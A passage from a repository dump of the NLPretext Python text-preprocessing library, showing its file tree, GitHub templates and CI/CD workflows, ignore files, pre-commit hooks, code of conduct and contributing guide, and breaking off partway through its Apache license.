Repository: artefactory/NLPretext
Branch: main
Commit: 0d2cc4fe9e5d
Files: 72
Total size: 410.9 KB

Directory structure:
gitextract_i1k0jy7m/

├── .dockerignore
├── .editorconfig
├── .github/
│   ├── .stale.yml
│   ├── CODEOWNERS
│   ├── ISSUE_TEMPLATE/
│   │   ├── bug_report.md
│   │   ├── config.yml
│   │   ├── feature_request.md
│   │   └── question.md
│   ├── PULL_REQUEST_TEMPLATE.md
│   ├── dependabot.yml
│   ├── release-drafter.yml
│   └── workflows/
│       ├── cd.yml
│       ├── ci.yml
│       ├── greetings.yml
│       └── release-drafter.yml
├── .gitignore
├── .pre-commit-config.yaml
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── LICENSE
├── Makefile
├── README.md
├── SECURITY.md
├── datasets/
│   └── external/
│       ├── get_language_dataset.sh
│       └── get_stanfordtweets.sh
├── docker/
│   ├── Dockerfile
│   └── README.md
├── docs/
│   ├── Makefile
│   ├── make.bat
│   ├── scripts/
│   │   └── buildsite.sh
│   └── source/
│       ├── _templates/
│       │   ├── module.rst_t
│       │   ├── package.rst_t
│       │   └── versions.html
│       ├── conf.py
│       ├── index.rst
│       └── tutorials/
│           ├── basic_notebook.ipynb
│           └── index.rst
├── nlpretext/
│   ├── __init__.py
│   ├── _config/
│   │   ├── __init__.py
│   │   ├── config.py
│   │   ├── constants.py
│   │   └── stopwords.py
│   ├── _utils/
│   │   ├── __init__.py
│   │   ├── daskloader.py
│   │   ├── file_loader.py
│   │   ├── pandasloader.py
│   │   ├── phone_number.py
│   │   └── stopwords.py
│   ├── augmentation/
│   │   ├── __init__.py
│   │   └── text_augmentation.py
│   ├── basic/
│   │   ├── __init__.py
│   │   └── preprocess.py
│   ├── cli/
│   │   ├── __init__.py
│   │   ├── __main__.py
│   │   └── preprocess.py
│   ├── preprocessor.py
│   ├── py.typed
│   ├── social/
│   │   ├── __init__.py
│   │   └── preprocess.py
│   ├── textloader.py
│   └── token/
│       ├── __init__.py
│       ├── preprocess.py
│       └── tokenizer.py
├── pyproject.toml
├── references/
│   └── .gitkeep
└── tests/
    ├── __init__.py
    ├── test_data_augmentation.py
    ├── test_file_loader.py
    ├── test_phone_number.py
    ├── test_preprocessor.py
    ├── test_textloader.py
    └── test_tokenizer.py

================================================
FILE CONTENTS
================================================

================================================
FILE: .dockerignore
================================================
# Git
.git
.gitignore
.github

# Docker
.dockerignore
docker/

# IDE
.idea
.vscode

# Byte-compiled / optimized / DLL files
__pycache__/
**/__pycache__/
*.pyc
*.pyo
*.pyd
.Python
*.py[cod]
*$py.class
.pytest_cache/
..mypy_cache/

# poetry
.venv

# C extensions
*.so

# Virtual environment
.venv
venv

.DS_Store
.AppleDouble
.LSOverride
._*


================================================
FILE: .editorconfig
================================================
# Check http://editorconfig.org for more information
# This is the main config file for this project:
root = true

[*]
charset = utf-8
end_of_line = lf
insert_final_newline = true
indent_style = space
indent_size = 2
trim_trailing_whitespace = true

[*.{py, pyi}]
indent_style = space
indent_size = 4

[Makefile]
indent_style = tab

[*.md]
trim_trailing_whitespace = false

[*.{diff,patch}]
trim_trailing_whitespace = false


================================================
FILE: .github/.stale.yml
================================================
# Number of days of inactivity before an issue becomes stale
daysUntilStale: 60
# Number of days of inactivity before a stale issue is closed
daysUntilClose: 7
# Issues with these labels will never be considered stale
exemptLabels:
  - pinned
  - security
# Label to use when marking an issue as stale
staleLabel: wontfix
# Comment to post when marking an issue as stale. Set to `false` to disable
markComment: >
  This issue has been automatically marked as stale because it has not had
  recent activity. It will be closed if no further activity occurs. Thank you
  for your contributions.
# Comment to post when closing a stale issue. Set to `false` to disable
closeComment: false


================================================
FILE: .github/CODEOWNERS
================================================
# https://help.github.com/en/articles/about-code-owners

*   @julesbertrand @amaleelhamri @hugovasselin @Guillaume6606


================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: 🐛 Bug report
about: If something isn't working 🔧
title: ''
labels: bug
assignees:
---

## 🐛 Bug Report

<!-- A clear and concise description of what the bug is. -->

## 🔬 How To Reproduce

Steps to reproduce the behavior:

1. ...

### Code sample

<!-- If applicable, attach a minimal code sample to reproduce the decried issue. -->

### Environment

* OS: [e.g. Linux / Windows / macOS]
* Python version, get it with:

```bash
python --version
```

### Screenshots

<!-- If applicable, add screenshots to help explain your problem. -->

## 📈 Expected behavior

<!-- A clear and concise description of what you expected to happen. -->

## 📎 Additional context

<!-- Add any other context about the problem here. -->


================================================
FILE: .github/ISSUE_TEMPLATE/config.yml
================================================
# Configuration: https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository

blank_issues_enabled: false


================================================
FILE: .github/ISSUE_TEMPLATE/feature_request.md
================================================
---
name: 🚀 Feature request
about: Suggest an idea for this project 🏖
title: ''
labels: enhancement
assignees:
---

## 🚀 Feature Request

<!-- A clear and concise description of the feature proposal. -->

## 🔈 Motivation

<!-- Please describe the motivation for this proposal. -->

## 🛰 Alternatives

<!-- A clear and concise description of any alternative solutions or features you've considered. -->

## 📎 Additional context

<!-- Add any other context or screenshots about the feature request here. -->


================================================
FILE: .github/ISSUE_TEMPLATE/question.md
================================================
---
name: ❓ Question
about: Ask a question about this project 🎓
title: ''
labels: question
assignees:
---

## Checklist

<!-- Mark with an `x` all the checkboxes that apply (like `[x]`) -->

- [ ] I've searched the project's [`issues`](https://github.com/artefactory/NLPretext}/issues?q=is%3Aissue).

## ❓ Question

<!-- What is your question -->

How can I [...]?

Is it possible to [...]?

## 📎 Additional context

<!-- Add any other context or screenshots about the feature request here. -->


================================================
FILE: .github/PULL_REQUEST_TEMPLATE.md
================================================
## Description

<!-- Add a more detailed description of the changes if needed. -->

## Related Issue

<!-- If your PR refers to a related issue, link it here. -->

## Type of Change

<!-- Mark with an `x` all the checkboxes that apply (like `[x]`) -->

- [ ] 📚 Examples / docs / tutorials / dependencies update
- [ ] 🔧 Bug fix (non-breaking change which fixes an issue)
- [ ] 🥂 Improvement (non-breaking change which improves an existing feature)
- [ ] 🚀 New feature (non-breaking change which adds functionality)
- [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change)
- [ ] 🔐 Security fix

## Checklist

<!-- Mark with an `x` all the checkboxes that apply (like `[x]`) -->

- [ ] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext}/blob/main/CODE_OF_CONDUCT.md) document.
- [ ] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext}/blob/main/CONTRIBUTING.md) guide.
- [ ] I've updated the code style using `make format-code`.
- [ ] I've written tests for all new methods and classes that I created.
- [ ] I've written the docstring in Google format for all the methods and classes that I used.


================================================
FILE: .github/dependabot.yml
================================================
# Configuration: https://dependabot.com/docs/config-file/
# Docs: https://docs.github.com/en/github/administering-a-repository/keeping-your-dependencies-updated-automatically

version: 2

updates:
  - package-ecosystem: "pip"
    directory: "/"
    schedule:
      interval: "weekly"
      day: "monday"
      time: "09:00"
    allow:
      - dependency-type: "all"
    ignore:
      - dependency-name: "*"
        update-types: ["version-update:semver-patch"]
    labels:
      - draft
      - dependencies
      - python
  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
      day: "monday"
      time: "09:00"
    allow:
      - dependency-type: "all"
    labels:
      - draft
      - dependencies
      - github_actions
  - package-ecosystem: "docker"
    directory: "/docker/"
    schedule:
      interval: "weekly"
      day: "monday"
      time: "09:00"
    allow:
      - dependency-type: "all"
    labels:
      - draft
      - dependencies
      - docker


================================================
FILE: .github/release-drafter.yml
================================================
# Release drafter configuration https://github.com/release-drafter/release-drafter#configuration
# Emojis were chosen to match the https://gitmoji.carloscuesta.me/

name-template: "$NEXT_PATCH_VERSION"
tag-template: "$NEXT_PATCH_VERSION"

categories:
  - title: ":rocket: Features"
    labels: [enhancement, feature]
  - title: ":wrench: Fixes & Refactoring"
    labels: [bug, refactoring, bugfix, fix]
  - title: ":package: Build System & CI/CD"
    labels: [build, ci, testing]
  - title: ":boom: Breaking Changes"
    labels: [breaking]
  - title: ":pencil: Documentation"
    labels: [documentation]
  - title: ":arrow_up: Dependencies updates"
    labels: [dependencies]

template: |
  ## What’s Changed

  $CHANGES

  ## :busts_in_silhouette: List of contributors

  $CONTRIBUTORS


================================================
FILE: .github/workflows/cd.yml
================================================
name: Continuous Deployment
on:
  release:
    types: [published]

jobs:

  docker:

    runs-on: ubuntu-latest

    steps:
    - name: Checkout
      uses: actions/checkout@v4

    - name: Set up Docker Buildx
      uses: docker/setup-buildx-action@v3

    - name: Login to Github Container Registry
      uses: docker/login-action@v3
      with:
        username: ${{ github.actor }}
        password: ${{ secrets.GITHUB_TOKEN }}
        registry: ghcr.io

    - name: Set tag name
      id: tag
      run: echo "tag_name=${GITHUB_REF//\//-}" >> $GITHUB_OUTPUT
      env:
        GITHUB_REF: ${{ github.ref }}

    - name: Build and push
      uses: docker/build-push-action@v4
      with:
        context: .
        file: ./docker/Dockerfile
        push: true
        tags: |
          ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}
          ghcr.io/artefactory/nlpretext:latest
        cache-from: type=registry,ref=ghcr.io/artefactory/nlpretext:latest
        cache-to: type=inline

    - name: Scan image
      uses: anchore/scan-action@v3
      id: scan
      with:
        image: "ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}"
        output-format: table

    - name: upload Anchore scan SARIF report
      if: success() || failure()
      uses: github/codeql-action/upload-sarif@v1
      with:
        sarif_file: ${{ steps.scan.outputs.sarif }}

  documentation_and_package:

    runs-on: ubuntu-latest

    strategy:
      matrix:
        python-version: ["3.8"]

    steps:

    - name: Checkout
      uses: actions/checkout@v4

    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v4
      with:
        python-version: ${{ matrix.python-version }}

    - name: Install poetry and pandoc
      run: |
        sudo apt-get install pandoc
        make download-poetry

    - name: Set up cache
      uses: actions/cache@v3.3.2
      with:
        path: ~/.cache/pypoetry/virtualenvs
        key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}

    - name: Set Poetry Path
      run: |
        echo "$HOME/.poetry/bin" >> $GITHUB_PATH

    - name: Install dependencies
      run: |
        poetry install -E torch -E dask

    - name: Publish to PyPI
      env:
        PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
      run: |
        poetry config pypi-token.pypi $PYPI_TOKEN
        poetry publish --build

    - name: Run build script for Sphinx pages
      run: |
        poetry run git config --global user.name "Github-Pages Bot"
        poetry run git config --global user.email "github-pages@artefactory.com"
        poetry run sh docs/scripts/buildsite.sh
      shell: bash


================================================
FILE: .github/workflows/ci.yml
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
name: Continuous Integration

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - '*'

jobs:
  ci:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        python-version: ["3.8", "3.9", "3.10"]
    if: ${{ !contains(github.event.pull_request.labels.*.name, 'draft') }}

    steps:
    - uses: actions/checkout@v2

    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v4
      with:
        python-version: ${{ matrix.python-version }}
        cache: 'pip'

    - name: Install poetry
      run: make download-poetry

    - name: Set up pip cache
      uses: actions/cache@v3.3.2
      with:
        path: ~/.cache/pypoetry/virtualenvs
        key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}

    - name: Set up mypy cache
      uses: actions/cache@v3.2.4
      with:
        path: ${{ github.workspace }}/.mypy_cache
        key: mypy-${{ matrix.python-version }}

    - name: Set Poetry Path
      run: |
        echo "$HOME/.poetry/bin" >> $GITHUB_PATH

    - name: Install dependencies
      run: |
        poetry run pip install --upgrade pip
        poetry install -E torch -E dask

    - name: Run safety checks
      run: |
        STRICT=1 make check-safety

    - name: Lint and format
      run: |
        make format-code

    - name: Run tests
      run: |
        make test


================================================
FILE: .github/workflows/greetings.yml
================================================
name: Greetings

on:
  pull_request:
    types:
      - opened
      - reopened
      - edited
      - labeled
      - unlabeled
      - synchronize
  issues:

jobs:
  greeting:
    runs-on: ubuntu-latest
    if: ${{ !contains(github.head_ref, 'dependabot/') }}
    steps:
    - uses: actions/first-interaction@v1
      with:
        repo-token: ${{ secrets.GITHUB_TOKEN }}
        pr-message:  'Hello @${{ github.actor }}, thank you for submitting a PR! We will respond as soon as possible.'
        issue-message: |
          Hello @${{ github.actor }}, thank you for your interest in our work!

          If this is a bug report, please provide screenshots and **minimum viable code to reproduce your issue**, otherwise we can not help you.


================================================
FILE: .github/workflows/release-drafter.yml
================================================
name: Release Drafter

on:
  push:
    # branches to consider in the event; optional, defaults to all
    branches:
      - main

jobs:
  update_release_draft:
    runs-on: ubuntu-latest
    steps:
      # Drafts your next Release notes as Pull Requests are merged into "main"
      - uses: release-drafter/release-drafter@v5.22.0
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}


================================================
FILE: .gitignore
================================================
# Created by https://www.gitignore.io/api/osx,python,pycharm,windows,visualstudio,visualstudiocode
# Edit at https://www.gitignore.io/?templates=osx,python,pycharm,windows,visualstudio,visualstudiocode

### OSX ###
# General
.DS_Store
.AppleDouble
.LSOverride

# Icon must end with two \r
Icon

# Thumbnails
._*

# Files that might appear in the root of a volume
.DocumentRevisions-V100
.fseventsd
.Spotlight-V100
.TemporaryItems
.Trashes
.VolumeIcon.icns
.com.apple.timemachine.donotpresent

# Directories potentially created on remote AFP share
.AppleDB
.AppleDesktop
Network Trash Folder
Temporary Items
.apdisk

### PyCharm ###
# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm
# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839

# User-specific stuff
.idea/
.idea/**/workspace.xml
.idea/**/tasks.xml
.idea/**/usage.statistics.xml
.idea/**/dictionaries
.idea/**/shelf

# Generated files
.idea/**/contentModel.xml

# Sensitive or high-churn files
.idea/**/dataSources/
.idea/**/dataSources.ids
.idea/**/dataSources.local.xml
.idea/**/sqlDataSources.xml
.idea/**/dynamic.xml
.idea/**/uiDesigner.xml
.idea/**/dbnavigator.xml

# Gradle
.idea/**/gradle.xml
.idea/**/libraries

# Gradle and Maven with auto-import
# When using Gradle or Maven with auto-import, you should exclude module files,
# since they will be recreated, and may cause churn.  Uncomment if using
# auto-import.
# .idea/modules.xml
# .idea/*.iml
# .idea/modules
# *.iml
# *.ipr

# CMake
cmake-build-*/

# Mongo Explorer plugin
.idea/**/mongoSettings.xml

# File-based project format
*.iws

# IntelliJ
out/

# mpeltonen/sbt-idea plugin
.idea_modules/

# JIRA plugin
atlassian-ide-plugin.xml

# Cursive Clojure plugin
.idea/replstate.xml

# Crashlytics plugin (for Android Studio and IntelliJ)
com_crashlytics_export_strings.xml
crashlytics.properties
crashlytics-build.properties
fabric.properties

# Editor-based Rest Client
.idea/httpRequests

# Android studio 3.1+ serialized cache file
.idea/caches/build_file_checksums.ser

### PyCharm Patch ###
# Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721

# *.iml
# modules.xml
# .idea/misc.xml
# *.ipr

# Sonarlint plugin
.idea/**/sonarlint/

# SonarQube Plugin
.idea/**/sonarIssues.xml

# Markdown Navigator plugin
.idea/**/markdown-navigator.xml
.idea/**/markdown-navigator/

### Python ###
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# C extensions
*.so

# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST

# PyInstaller
#  Usually these files are written by a python script from a template
#  before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec

# Installer logs
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/
.pytest_cache/
.ruff_cache/

# Translations
*.mo
*.pot

# Scrapy stuff:
.scrapy

# Django stuff:
*.log

# Sphinx documentation
docs/_build/

# PyBuilder
target/

# pyenv
.python-version

# poetry
.venv

# pipenv
#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
#   However, in case of collaboration, if having platform-specific dependencies or dependencies
#   having no cross-platform support, pipenv may install dependencies that don't work, or not
#   install all needed dependencies.
#Pipfile.lock

# celery beat schedule file
celerybeat-schedule

# SageMath parsed files
*.sage.py

# Spyder project settings
.spyderproject
.spyproject

# Rope project settings
.ropeproject

# Mr Developer
.mr.developer.cfg
.project
.pydevproject

# mkdocs documentation
/site

# mypy
.mypy_cache/
.dmypy.json
dmypy.json

# Pyre type checker
.pyre/

# Plugins
.secrets.baseline

### VisualStudioCode ###
.vscode/*
!.vscode/tasks.json
!.vscode/launch.json
!.vscode/extensions.json

### VisualStudioCode Patch ###
# Ignore all local history of files
.history

### Windows ###
# Windows thumbnail cache files
Thumbs.db
Thumbs.db:encryptable
ehthumbs.db
ehthumbs_vista.db

# Dump file
*.stackdump

# Folder config file
[Dd]esktop.ini

# Recycle Bin used on file shares
$RECYCLE.BIN/

# Windows Installer files
*.cab
*.msi
*.msix
*.msm
*.msp

# Windows shortcuts
*.lnk

### VisualStudio ###
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore

# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates

# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs

# Mono auto generated files
mono_crash.*

# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/

# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/

# Visual Studio 2017 auto generated files
Generated\ Files/

# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*

# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml

# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c

# Benchmark Results
BenchmarkDotNet.Artifacts/

# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/

# StyleCop
StyleCopReport.xml

# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc

# Chutzpah Test files
_Chutzpah*

# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb

# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap

# Visual Studio Trace Files
*.e2e

# TFS 2012 Local Workspace
$tf/

# Guidance Automation Toolkit
*.gpState

# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user

# JustCode is a .NET coding add-in
.JustCode

# TeamCity is a build add-in
_TeamCity*

# DotCover is a Code Coverage Tool
*.dotCover

# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json

# Visual Studio code coverage results
*.coverage
*.coveragexml

# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*

# MightyMoose
*.mm.*
AutoTest.Net/

# Web workbench (sass)
.sass-cache/

# Installshield output folder
[Ee]xpress/

# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html

# Click-Once directory
publish/

# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj

# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/

# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets

# Microsoft Azure Build Output
csx/
*.build.csdef

# Microsoft Azure Emulator
ecf/
rcf/

# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload

# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/

# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs

# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk

# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/

# RIA/Silverlight projects
Generated_Code/

# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak

# SQL Server files
*.mdf
*.ldf
*.ndf

# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl

# Microsoft Fakes
FakesAssemblies/

# GhostDoc plugin setting file
*.GhostDoc.xml

# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/

# Visual Studio 6 build log
*.plg

# Visual Studio 6 workspace options file
*.opt

# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw

# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions

# Paket dependency manager
.paket/paket.exe
paket-files/

# FAKE - F# Make
.fake/

# CodeRush personal settings
.cr/personal

# Python Tools for Visual Studio (PTVS)
*.pyc

# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config

# Tabs Studio
*.tss

# Telerik's JustMock configuration file
*.jmconfig

# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs

# OpenCover UI analysis results
OpenCover/

# Azure Stream Analytics local run output
ASALocalRun/

# MSBuild Binary and Structured Log
*.binlog

# NVidia Nsight GPU debugger configuration file
*.nvuser

# MFractors (Xamarin productivity tool) working folder
.mfractor/

# Local History for Visual Studio
.localhistory/

# BeatPulse healthcheck temp database
healthchecksdb

# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/

# DotEnv configuration
.env

# Database
*.db
*.rdb

# Pycharm
.idea
venv/

# VS Code
.vscode/

# Spyder
.spyproject/

# Jupyter NB Checkpoints
.ipynb_checkpoints/

# exclude data from source control by default


# vim
*.swp
*.swo

data/


================================================
FILE: .pre-commit-config.yaml
================================================
default_language_version:
  python: python3.10


repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.5.0
    hooks:
    - id: trailing-whitespace
    - id: end-of-file-fixer
    - id: check-yaml
    - id: check-toml
    - id: check-json
    - id: check-added-large-files

  - repo: local
    hooks:
      - id: isort
        name: isort
        entry: poetry run isort --settings-path pyproject.toml
        types: [python]
        language: system
        stages: [commit, push]
      - id: pyupgrade
        name: pyupgrade
        entry: poetry run pyupgrade --py38-plus
        types: [python]
        language: system
        stages: [commit, push]
      - id: black
        name: black
        entry: poetry run black --config pyproject.toml
        types: [python]
        language: system
        stages: [commit, push]
      - id: ruff
        name: ruf
        entry: poetry run ruff check --config pyproject.toml
        types: [python]
        language: system
        stages: [commit, push]
      - id: mypy
        name: mypy
        entry: poetry run mypy
        require_serial: true
        types: [python]
        language: system
        stages: [push]
      - id: gitleaks
        name: gitleaks
        entry: make gitleaks
        require_serial: true
        types: [file]
        language: system
        pass_filenames: false
        stages: [push]


================================================
FILE: CODE_OF_CONDUCT.md
================================================
# Contributor Covenant Code of Conduct

## Our Pledge

In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, sex characteristics, gender identity and expression,
level of experience, education, socio-economic status, nationality, personal
appearance, race, religion, or sexual identity and orientation.

## Our Standards

Examples of behavior that contributes to creating a positive environment
include:

* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members

Examples of unacceptable behavior by participants include:

* The use of sexualized language or imagery and unwelcome sexual attention or
 advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
 address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
 professional setting

## Our Responsibilities

Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.

Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.

## Scope

This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.

## Enforcement

Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at rafaelle.aygalenq@artefact.com. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.

Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.

## Attribution

This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html

[homepage]: https://www.contributor-covenant.org

For answers to common questions about this code of conduct, see
https://www.contributor-covenant.org/faq


================================================
FILE: CONTRIBUTING.md
================================================
NLPretext
==============================

# How to contribute

## Dependencies

We use `poetry` to manage the [dependencies](https://github.com/python-poetry/poetry).
If you dont have `poetry` installed, you should run the command below.

```bash
make download-poetry; export PATH="$HOME/.local/bin:$PATH"
```

To install dependencies and prepare [`pre-commit`](https://pre-commit.com/) hooks you would need to run `install` command:

```bash
make install
```

To activate your `virtualenv` run `poetry shell`.

## Codestyle

After you run `make install` you can execute the automatic code formatting.

```bash
make format-code
```

### Checks

Many checks are configured for this project. Command `make check-style` will run black diffs, darglint docstring style and mypy.
The `make check-safety` command will look at the security of your code.

You can also use `STRICT=1` flag to make the check be strict.

### Before submitting

Before submitting your code please do the following steps:

1. Add any changes you want
1. Add tests for the new changes
1. Edit documentation if you have changed something significant
1. Run `make format-code` to format your changes.
1. Run `STRICT=1 make check-style` to ensure that types and docs are correct
1. Run `STRICT=1 make check-safety` to ensure that security of your code is correct

## Other help

You can contribute by spreading a word about this library.
It would also be a huge contribution to write
a short article on how you are using this project.
You can also share your best practices with us.

# Docstring format

We chose to use **Numpydoc** over the several [standards](https://stackoverflow.com/questions/3898572/what-is-the-standard-python-docstring-format)

```
"""
My numpydoc description of a kind
of very exhautive numpydoc format docstring.

Parameters
----------
first : array_like
    the 1st param name `first`
second :
    the 2nd param
third : {'value', 'other'}, optional
    the 3rd param, by default 'value'

Returns
-------
string
    a value in a string

Raises
------
KeyError
    when a key error
OtherError
    when an other error
"""
```


================================================
FILE: LICENSE
================================================
                                   Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/

   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

   1. Definitions.

      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.

      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.

      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.

      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.

      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.

      "Object" form shall mean any form resulting from mechanical
